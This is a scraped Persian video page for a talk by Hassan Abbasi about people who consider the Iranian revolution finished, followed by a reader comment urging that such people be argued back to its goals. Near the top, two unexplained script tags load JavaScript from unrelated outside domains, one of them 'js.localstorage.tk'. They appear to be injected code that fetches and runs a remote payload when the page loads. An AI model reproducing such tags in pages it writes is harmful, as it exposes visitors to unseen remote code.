از نفس افتادگانی که انقلاب را تمام شده می دانند!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>سخنران: حسن عباسی

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
4

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)
  • عکس العمل درست چیست؟
    ---
    هرکس که انقلاب را تمام شده بداند خواسته یا نا خواسته ، دانسته با نداسته با روی آوردن به راحت طلبی خدا گریز پای در راه واپس گرایی به سوی دوران طاغوت و پشت کردن به اهداف و ارزشهای انقلاب گذاشته و راه غلط را می پیماید.
    این شخص اگر بیدار نشود و به خود نیاید و واقعیتهای ضروری انقلاب را درک نکند و خود را به تقویت این واقعیتها صادقانه و با جدیت پایبند نسازد زیان او برای نظام و جامعه بیش از نفع او است و نباید به او کارهای سرنوشت سازی سپرده شود.
    این شخص را می باید پیوسته با بحثهای منطقی به همه ی واقعیتهای دورانهای مختلف و فواید اهداف انقلاب و ایمان و صداقت و امانت داری نسبت به این اهداف و زیانهای اهداف دوران طاغوت آگاه ساخت و از رفتن به راه غلطی که انتخاب کرده با منطق عقل و علم پشیمان کرد.